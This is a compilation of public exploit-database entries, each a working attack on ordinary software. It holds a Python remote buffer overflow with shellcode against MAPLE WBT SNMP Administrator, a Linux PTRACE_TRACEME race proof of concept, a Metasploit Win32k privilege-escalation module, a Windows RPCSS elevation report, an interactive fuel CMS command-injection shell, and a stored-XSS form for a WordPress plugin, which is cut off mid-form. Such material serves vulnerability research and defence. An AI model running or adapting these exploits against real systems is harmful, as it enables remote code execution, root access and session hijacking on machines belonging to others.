# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow # Author: hyp3rlinx # Discovery Date: 2019-07-17 # Vendor Homepage: www.computerlab.com # Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager # Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE # Tested on OS: Windows # CVE: CVE-2019-13577 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt [+] ISR: Apparition Security [Vendor] www.computerlab.com [Product] MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15 https://www.computerlab.com/index.php/downloads/category/27-device-manager ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4 The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol). Agents are built into the clients for remote management and configuration. [Vulnerability Type] Unauthenticated Remote Buffer Overflow Code Execution 0day [CVE Reference] CVE-2019-13577 [Security Issue] SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987. This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution. Authentication is not required for this exploit. This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code. When installing the vulnerable program if asks for a serial number just enter a value of "1" or something. 
Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin. Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them. e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp ASLR / SEH all set to False helping to make exploit more portable. CALL EBX 10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll) Stack dump: EAX 41414141 ECX 0018FEFC EDX 0018FF10 EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ESP 0018FECC EBP 0018FEF4 ESI 0018FF10 EDI 0018FEFC EIP 41414141 C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_NO_SCROLLBARS (000005A7) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) [Exploit/POC] from socket import * import struct,sys,argparse #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15 #CVE-2019-13577 #Remote Buffer Overflow 0day #hyp3rlinx - ApparitionSec #Pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") eip = struct.pack("<L", 0x10008fb3) #JMP EBX popebx = struct.pack("<L", 0x022C0012) #5B POP EBX buf0="B"*693704 buf1=eip buf2=popebx+sc+"R"*899+"W"*23975 payload=buf0+buf1+buf2 def doit(IP,payload): try: s=socket(AF_INET, SOCK_STREAM) s.connect((IP, 987)) 
s.send(payload) print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day." print "hyp3rlinx" s.close() except Exception as e: print str(e) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577") return parser.parse_args() def main(args): doit(args.ipaddress,payload) if __name__ == "__main__": if not len(sys.argv) > 1: print "[*] No args supplied see Help -h" exit() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=THMqueCIrFw [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: July 10, 2019 Second vendor notification attempt: July 13, 2019 No vendor replies. July 17, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME
== Summary == This bug report describes two issues introduced by commit 64b875f7ac8a ("ptrace: Capture the ptracer's creds not PT_PTRACE_CAP", introduced in v4.10 but also stable-backported to older versions). I will send a suggested patch in a minute ("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME"). When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference to the parent's objective credentials, then give that pointer to get_cred(). However, the object lifetime rules for things like struct cred do not permit unconditionally turning an RCU reference into a stable reference. PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges. == Long bug description == While I was trying to refactor the cred_guard_mutex logic, I stumbled over the following issues: ptrace relationships can be set up in two ways: Either the tracer attaches to another process (PTRACE_ATTACH/PTRACE_SEIZE), or the tracee forces its parent to attach to it (PTRACE_TRACEME). When a tracee goes through a privilege-gaining execve(), the kernel checks whether the ptrace relationship is privileged. If it is not, the privilege-gaining effect of execve is suppressed. The idea here is that a privileged tracer (e.g. if root runs "strace" on some process) is allowed to trace through setuid/setcap execution, but an unprivileged tracer must not be allowed to do that, since it could otherwise inject arbitrary code into privileged processes. 
In the PTRACE_ATTACH/PTRACE_SEIZE case, the tracer's credentials are recorded at the time it calls PTRACE_ATTACH/PTRACE_SEIZE; later, when the tracee goes through execve(), it is checked whether the recorded credentials are capable over the tracee's user namespace. But in the PTRACE_TRACEME case, the kernel also records _the tracer's_ credentials, even though the tracer is not requesting the operation. There are two problems with that. First, there is an object lifetime issue: ptrace_traceme() -> ptrace_link() grabs __task_cred(new_parent) in an RCU read-side critical section, then passes the creds to __ptrace_link(), which calls get_cred() on them. If the parent concurrently switches its creds (e.g. via setresuid()), the creds' refcount may already be zero, in which case put_cred_rcu() will already have been scheduled. The kernel usually manages to panic() before memory corruption occurs here using the following code in put_cred_rcu(); however, I think memory corruption would also be possible if this code races exactly the right way. 
/*
 * The check in put_cred_rcu() that usually turns the race into a panic instead of
 * silent memory corruption:
 *
 *     if (atomic_read(&cred->usage) != 0)
 *             panic("CRED: put_cred_rcu() sees %p with usage %d\n",
 *                   cred, atomic_read(&cred->usage));
 *
 * A simple PoC to trigger this bug:
 * ============================
 */
#define _GNU_SOURCE
#include <unistd.h>
#include <signal.h>
#include <sched.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/ptrace.h>

/*
 * Body of each short-lived grandchild: ask the kernel to make the parent trace
 * it. Because the grandchild is created with CLONE_PARENT (see main), its parent
 * is the top-level process, so ptrace_traceme() grabs *that* process's
 * credentials -- the ones the top-level loop keeps replacing via setresuid().
 */
int grandchild_fn(void *dummy) {
  if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
    err(1, "traceme");
  return 0;
}

int main(void) {
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");

  /* child */
  if (child == 0) {
    /* one static stack is enough: CLONE_VFORK means only one grandchild runs at a time */
    static char child_stack[0x100000];
    /* make this spawner die with the parent so the loop does not outlive the test */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    /* keep spawning PTRACE_TRACEME callers to race against the parent's cred switches */
    while (1) {
      if (clone(grandchild_fn, child_stack+sizeof(child_stack),
                CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_PARENT|CLONE_VM|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VFORK,
                NULL) == -1)
        err(1, "clone failed");
    }
  }

  /* parent */
  /*
   * Same uid every time, but each setresuid() still goes through commit_creds()
   * and installs a fresh struct cred, dropping the old one -- that is the
   * concurrent cred switch the RCU-reference bug needs.
   */
  uid_t uid = getuid();
  while (1) {
    if (setresuid(uid, uid, uid))
      err(1, "setresuid");
  }
}
/*
 * ============================
 * Result:
 * ============================
 * [ 484.576983] ------------[ cut here ]------------
 * [ 484.580565] kernel BUG at kernel/cred.c:138!
 * [ 484.585278] Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1
 * [ 484.589063] CPU: 1 PID: 1908 Comm: panic Not tainted 5.2.0-rc7 #431
 * [ 484.592410] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
 * [ 484.595843] Call Trace:
 * [ 484.598688]  <IRQ>
 * [ 484.601451]  dump_stack+0x7c/0xbb
 * [...]
 * [ 484.607349]  panic+0x188/0x39a
 * [...]
 * [ 484.622650]  put_cred_rcu+0x112/0x120
 * [...]
 * [ 484.628580]  rcu_core+0x664/0x1260
 * [...]
 */
[ 484.646675] __do_softirq+0x11d/0x5dd [ 484.649523] irq_exit+0xe3/0xf0 [ 484.652374] smp_apic_timer_interrupt+0x103/0x320 [ 484.655293] apic_timer_interrupt+0xf/0x20 [ 484.658187] </IRQ> [ 484.660928] RIP: 0010:do_error_trap+0x8d/0x110 [ 484.664114] Code: da 4c 89 ee bf 08 00 00 00 e8 df a5 09 00 3d 01 80 00 00 74 54 48 8d bb 90 00 00 00 e8 cc 8e 29 00 f6 83 91 00 00 00 02 75 2b <4c> 89 7c 24 40 44 8b 4c 24 04 48 83 c4 08 4d 89 f0 48 89 d9 4c 89 [ 484.669035] RSP: 0018:ffff8881ddf2fd58 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13 [ 484.672784] RAX: 0000000000000000 RBX: ffff8881ddf2fdb8 RCX: ffffffff811144dd [ 484.676450] RDX: 0000000000000007 RSI: dffffc0000000000 RDI: ffff8881eabc4bf4 [ 484.680306] RBP: 0000000000000006 R08: fffffbfff0627a02 R09: 0000000000000000 [ 484.684033] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004 [ 484.687697] R13: ffffffff82618dc0 R14: 0000000000000000 R15: ffffffff810c99d5 [...] [ 484.700626] do_invalid_op+0x31/0x40 [...] [ 484.707183] invalid_op+0x14/0x20 [ 484.710499] RIP: 0010:__put_cred+0x65/0x70 [ 484.713598] Code: 48 8d bd 90 06 00 00 e8 49 e2 1f 00 48 3b 9d 90 06 00 00 74 19 48 8d bb 90 00 00 00 48 c7 c6 50 98 0c 81 5b 5d e9 ab 1f 08 00 <0f> 0b 0f 0b 0f 0b 0f 1f 44 00 00 55 53 48 89 fb 48 81 c7 90 06 00 [ 484.718633] RSP: 0018:ffff8881ddf2fe68 EFLAGS: 00010202 [ 484.722407] RAX: 0000000000000001 RBX: ffff8881f38a4600 RCX: ffffffff810c9987 [ 484.726147] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8881f38a4600 [ 484.730049] RBP: ffff8881f38a4600 R08: ffffed103e7148c1 R09: ffffed103e7148c1 [ 484.733857] R10: 0000000000000001 R11: ffffed103e7148c0 R12: ffff8881eabc4380 [ 484.737923] R13: 00000000000003e8 R14: ffff8881f1a5b000 R15: ffff8881f38a4778 [...] [ 484.748760] commit_creds+0x41c/0x520 [...] 
[ 484.756115] __sys_setresuid+0x1cb/0x1f0 [ 484.759634] do_syscall_64+0x5d/0x260 [ 484.763024] entry_SYSCALL_64_after_hwframe+0x49/0xbe [ 484.766441] RIP: 0033:0x7fcab9bb4845 [ 484.769839] Code: 0f 1f 44 00 00 48 83 ec 38 64 48 8b 04 25 28 00 00 00 48 89 44 24 28 31 c0 8b 05 a6 8e 0f 00 85 c0 75 2a b8 75 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 53 48 8b 4c 24 28 64 48 33 0c 25 28 00 00 00 [ 484.775183] RSP: 002b:00007ffe01137aa0 EFLAGS: 00000246 ORIG_RAX: 0000000000000075 [ 484.779226] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcab9bb4845 [ 484.783057] RDX: 00000000000003e8 RSI: 00000000000003e8 RDI: 00000000000003e8 [ 484.787101] RBP: 00007ffe01137af0 R08: 0000000000000000 R09: 00007fcab9caf500 [ 484.791045] R10: fffffffffffff4d4 R11: 0000000000000246 R12: 00005573b2f240b0 [ 484.794891] R13: 00007ffe01137bd0 R14: 0000000000000000 R15: 0000000000000000 [ 484.799171] Kernel Offset: disabled [ 484.802932] ---[ end Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 ]--- ============================ The second problem is that, because the PTRACE_TRACEME case grabs the credentials of a potentially unaware tracer, it can be possible for a normal user to create and use a ptrace relationship that is marked as privileged even though no privileged code ever requested or used that ptrace relationship. This requires the presence of a setuid binary with certain behavior: It has to drop privileges and then become dumpable again (via prctl() or execve()). - task A: fork()s a child, task B - task B: fork()s a child, task C - task B: execve(/some/special/suid/binary) - task C: PTRACE_TRACEME (creates privileged ptrace relationship) - task C: execve(/usr/bin/passwd) - task B: drop privileges (setresuid(getuid(), getuid(), getuid())) - task B: become dumpable again (e.g. 
execve(/some/other/binary)) - task A: PTRACE_ATTACH to task B - task A: use ptrace to take control of task B - task B: use ptrace to take control of task C Polkit's pkexec helper fits this pattern. On a typical desktop system, any process running under an active local session can invoke some helpers through pkexec (see configuration in /usr/share/polkit-1/actions, search for <action>s that specify <allow_active>yes</allow_active> and <annotate key="org.freedesktop.policykit.exec.path">...</annotate>). While pkexec is normally used to run programs as root, pkexec actually allows its caller to specify the user to run a command as with --user, which permits using pkexec to run a command as the user who executed pkexec. (Which is kinda weird... why would I want to run pkexec helpers as more than one fixed user?) I have attached a proof-of-concept that works on Debian 10 running a distro kernel and the XFCE desktop environment; if you use a different desktop environment, you may have to add a path to the `helpers` array in the PoC. When you compile and run it in an active local session, you should get a root shell within a second. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
-
Microsoft Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)
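##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for CVE-2018-8453 (Win32k NtUserSetWindowFNID).
#
# The module does not implement the kernel exploit itself: it uploads a
# precompiled helper (data/exploits/CVE-2018-8453/CVE-2018-8453.exe) together
# with a payload executable and runs the helper with two build-specific offsets
# from the selected target. Only Windows 10 v1703 (build 15063) x86 is
# supported; the offsets are wrong on any other build and the notes record that
# a failed attempt crashes the host.
class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Windows NtUserSetWindowFNID Win32k User Callback',
      'Description'    => %q{
        An elevation of privilege vulnerability exists in Windows when the Win32k
        component fails to properly handle objects in memory, aka "Win32k Elevation
        of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2,
        Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012,
        Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
        Windows 10 Servers.

        This module is tested against Windows 10 v1703 x86.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'ze0r',          # Exploit analysis and PoC
        'Kaspersky Lab', # Vulnerability discovery/detection
        'Jacob Robles'   # Metasploit module
      ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => { 'EXITFUNC' => 'thread' },
      'Targets'        => [
        [
          'Windows 10 v1703 (Build 15063) x86',
          {
            # Offsets handed to the helper binary on its command line; they are
            # specific to this build (see `exploit`).
            'UniqueProcessIdOffset' => 180,
            'TokenOffset'           => 252,
            # Prefix that sysinfo['OS'] must start with for this target to apply.
            'Version'               => 'Windows 10 (Build 15063)'
          }
        ]
      ],
      'References'     => [
        ['CVE', '2018-8453'],
        ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
        ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
        ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
        ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
      ],
      'Notes'          => {
        'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
        'Stability'   => [CRASH_OS_RESTARTS]
      },
      'DisclosureDate' => '2018-10-09',
      'DefaultTarget'  => 0
    ))
  end

  # Abort unless the session is unprivileged and the host matches the single
  # supported target (OS string prefix and x86 architecture).
  #
  # This check is the only guard against running the helper with the wrong
  # kernel offsets, which the module notes as a host crash, so it must stay
  # strict: a prefix match on 'Version' plus an exact architecture match.
  def target_info
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
      fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
    end
  end

  # Write `data` to %TEMP%\<fname> on the target and return the remote path.
  #
  # A Meterpreter request failure (for example an unwritable TEMP directory) is
  # reported through fail_with so the module stops before trying to execute a
  # half-uploaded file.
  def write_file_to_target(fname, data)
    tempdir = session.sys.config.getenv('TEMP')
    file_loc = "#{tempdir}\\#{fname}"
    vprint_warning("Attempting to write #{fname} to #{tempdir}")
    write_file(file_loc, data)
    vprint_good("#{fname} written")
    file_loc
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
  end

  # Upload the precompiled helper and the payload EXE, register both for
  # cleanup, then run the helper as:
  #   <helper> "<payload>" <UniqueProcessIdOffset> <TokenOffset>
  # The helper is responsible for the kernel-side token swap and for launching
  # the payload; this method only reports that it was started.
  def exploit
    target_info

    exe_name = 'CVE-2018-8453.exe'
    exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
    # Fail with a clear message instead of an Errno::ENOENT if the bundled
    # helper is missing from the local data directory.
    fail_with(Failure::NotFound, "Exploit binary not found: #{exe_path}") unless File.file?(exe_path)

    vprint_status("Reading payload from file #{exe_path}")
    # binread: the helper is a PE image and must not go through text-mode
    # newline translation or encoding conversion on the local host.
    raw = File.binread(exe_path)

    tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
    vprint_status("Uploading exploit exe as: #{tmp_exe}")
    exe_rpath = write_file_to_target(tmp_exe, raw)
    register_file_for_cleanup(exe_rpath)

    tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
    vprint_status("Uploading payload #{tmp_payload}")
    payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
    register_file_for_cleanup(payload_rpath)

    # The two numeric arguments are the per-build offsets from the target
    # definition; presumably EPROCESS field offsets used by the helper for the
    # token swap -- confirm against the helper source (ze0r's repository).
    command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"
    vprint_status("Executing command: #{command}")
    # Not hidden: the helper creates windows on the interactive desktop
    # (hence SCREEN_EFFECTS in the notes).
    session.sys.process.execute(command, nil, {'Hidden' => false})
    print_good('Exploit finished, wait for privileged payload execution to complete.')
  end
end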
-
Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation
Windows: RPCSS Activation Kernel Security Callback EoP Platform: Windows 10 1903/1809 (not tested earlier) Class: Elevation of Privilege Security Boundary (per Windows Security Service Criteria): User boundary Summary: The RPCSS Activation Kernel RPC server's security callback can be bypassed, resulting in EoP. Description: The RPCSS service is split into two components: RPCSS, which runs as a low-privileged service account, and the DCOM launch service, which runs as SYSTEM and is responsible for creating new COM processes. Communication between the two services is over an RPC service named Activation Kernel (actkernel). When RPCSS receives a DCOM activation request it passes that request on to the actkernel service to create new processes. The actkernel RPC service implements various privileged operations, therefore it shouldn't be callable from a normal user account. However, the service must know who made the activation request to RPCSS. This is achieved by RPCSS impersonating the activator while making the RPC request to actkernel, which means the ALPC port used by actkernel must be accessible by any process capable of activating a DCOM object, including AppContainer (AC) and Less Privileged AppContainer (LPAC) processes. To limit the call to only RPCSS, the service implements a security callback on the RPC server which checks that the caller's process ID is that of the RPCSS service; this should block arbitrary users on the system from calling the service. Unfortunately there's a flaw in this design: RPC defaults to caching the results of these security-callback checks, and actkernel doesn't disable this feature. What this means is that once a call is made to actkernel from RPCSS with a user's token, the security result is cached. Now that same user can access actkernel directly, as the security callback will not be made and the PID will not be checked. The caching is keyed primarily on the token's modified ID, which doesn't change as often as you'd expect, including across ALPC impersonation.
As long as the user has made some activation request (such as creating an OOP COM server), the result is cached and the process can access privileged operations. Looking at what the service exposes, an AC sandbox escape might be the best approach. For example the service exposes PrivGetPsmToken, which will set an arbitrary SYSAPPID value on a token and return it to the caller. If done from an AC this token is still an AC token in the original package, but with an arbitrary SYSAPPID set, which means that security checks which rely on that value can be bypassed. As the AC SID isn't changed, the token can be impersonated by the caller. This could allow sandbox escape via Browser Broker or Desktop Broker by pretending to be Edge or a side-loaded application. As for a fix: if performance is acceptable, setting the RPC_IF_SEC_NO_CACHE flag on the interface registration should ensure the security callback is always made. You'd probably want to do a search for similar interfaces on Windows. Actkernel might be special in doing a PID check and allowing arbitrary callers via another route, but I can't be sure it's the only one. Proof of Concept: I've provided a PoC as a C# project. It will use the vulnerability to get a token with an arbitrary SYSAPPID. It first respawns the PoC as the calculator AC, then gets a token for MicrosoftEdge. It doesn't attempt to escape the sandbox, but I'm confident it'd be possible to achieve. 1) Compile the C# project. It'll need to pull NtApiDotNet from NuGet to build. 2) As a normal user run the PoC. 3) The PoC should print the subkeys of the SAM hive. Expected Result: Accessing the actkernel RPC service should fail with an RPC fault. Observed Result: The actkernel RPC service grants access. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47135.zip
-
fuel CMS 1.4.1 - Remote Code Execution (1)
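# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#
# Usage: python exploit.py [base_url] [proxy_url|none]
#   Defaults are the values the original hard-coded (target on 127.0.0.1:8881,
#   Burp proxy on 127.0.0.1:8080). Pass "none" as the second argument to talk to
#   the target directly instead of failing because no proxy is listening.

import sys

try:
    from urllib import quote          # Python 2
except ImportError:
    from urllib.parse import quote    # Python 3

try:
    input = raw_input                 # Python 2: raw_input() reads a line without eval()
except NameError:
    pass

url = "http://127.0.0.1:8881"
proxy = {"http": "http://127.0.0.1:8080"}

# Injection placed in the `filter` GET parameter of /fuel/pages/select/.
# URL-decoded, the request carries:
#     '+pi(print($a='system'))+$a('<command>')+'
# It closes the quoted string the vulnerable code evaluates, assigns "system"
# to $a, calls $a(<command>) and re-opens a quote so the rest of the original
# expression still parses. (pi()/print() appear to be there only to keep the
# concatenation syntactically valid.) The command is URL-encoded with quote().
FILTER_PREFIX = "%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"
FILTER_SUFFIX = "%27%29%2b%27"


def find_nth_overlapping(haystack, needle, n):
    """Return the index of the n-th (1-based) occurrence of `needle` in
    `haystack`, counting overlapping matches; -1 if there are fewer than n."""
    pos = haystack.find(needle)
    while pos >= 0 and n > 1:
        pos = haystack.find(needle, pos + 1)
        n -= 1
    return pos


def build_url(base, command):
    """Build the full request URL for running `command` on `base`."""
    return base + "/fuel/pages/select/?filter=" + FILTER_PREFIX + quote(command) + FILTER_SUFFIX


def extract_output(text):
    """Strip the page body from a response, leaving the command output.

    The injected expression is evaluated more than once, so the command output
    reappears further down the response: the original PoC cuts at the second
    occurrence of the first 20 characters. If there is no second occurrence the
    whole text is returned (the original silently dropped the last character
    in that case because find() returned -1).
    """
    marker = text[0:20]
    cut = find_nth_overlapping(text, marker, 2)
    if cut < 0:
        return text
    return text[0:cut]


def run_command(base, command, proxies=None):
    """Send one command to the target and return its output."""
    import requests  # third-party; imported here so the pure helpers above stay importable without it
    r = requests.get(build_url(base, command), proxies=proxies)
    return extract_output(r.text)


def main(argv=None):
    """Interactive loop: read a command, run it on the target, print the output."""
    argv = sys.argv if argv is None else argv
    base = argv[1] if len(argv) > 1 else url
    if len(argv) > 2:
        proxies = None if argv[2] == "none" else {"http": argv[2]}
    else:
        proxies = proxy
    while True:
        cmd = input('cmd:')
        print(run_command(base, cmd, proxies))


if __name__ == "__main__":
    main()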
-
WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting
<!--
# Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting
# Date: 2019-07-18
# Vendor Homepage: https://www.onesignal.com
# Software Link: https://wordpress.org/plugins/onesignal-free-web-push-notifications/
# Affected version: 1.17.5
# Exploit Author: LiquidWorm
# Tested on: Linux

Summary: OneSignal is a high volume and reliable push notification service for
websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.

Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: WordPress 5.2.2
           Apache/2.4.39
           PHP/7.1.30

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php

Reproduction notes:
 - The form posts the plugin's settings page at /wp-admin/admin.php?page=onesignal-push,
   so it must be submitted from a browser that is logged in as a user who may
   edit those settings (the advisory classifies this as an authenticated XSS).
 - The nonce and API-key values below are sample values from the author's test
   instance. NOTE(review): WordPress nonces are normally bound to the current
   user session and expire, so replace `onesignal_config_page_nonce` with the
   value from the target's own settings page before replaying; a fixed nonce
   does not turn this into a working CSRF page on its own.
 - All other fields are the settings form's regular inputs and are carried
   along unchanged so the save request is accepted.
-->
<html>
<body>
  <!-- Cosmetic: rewrites the address bar to "/" so the page looks innocuous. -->
  <script>history.pushState('', 'SHPA', '/')</script>
  <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
    <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
    <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
    <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
    <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
    <!-- The injection point. The value first closes the attribute/quote in which the
         plugin echoes `subdomain` back unescaped, then adds a <script> element;
         confirm(251) is only a visible marker and can be replaced by any script. -->
    <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
    <input type="hidden" name="safari_web_id" value="" />
    <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
    <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
    <input type="hidden" name="persist_notifications" value="platform-default" />
    <input type="hidden" name="notification_title" value="hACKME" />
    <input type="hidden" name="notifyButton_enable" value="true" />
    <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
    <input type="hidden" name="notifyButton_prenotify" value="true" />
    <input type="hidden" name="notifyButton_showcredit" value="true" />
    <input type="hidden" name="notifyButton_customize_enable" value="true" />
    <input type="hidden" name="notifyButton_size" value="medium" />
    <input type="hidden" name="notifyButton_position" value="bottom-right" />
    <input type="hidden" name="notifyButton_theme" value="default" />
    <input type="hidden" name="notifyButton_offset_bottom" value="" />
    <input type="hidden" name="notifyButton_offset_left" value="" />
    <input type="hidden" name="notifyButton_offset_right" value="" />
    <input type="hidden" name="notifyButton_color_background" value="" />
    <input type="hidden" name="notifyButton_color_foreground" value="" />
    <input type="hidden" name="notifyButton_color_badge_background" value="" />
    <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
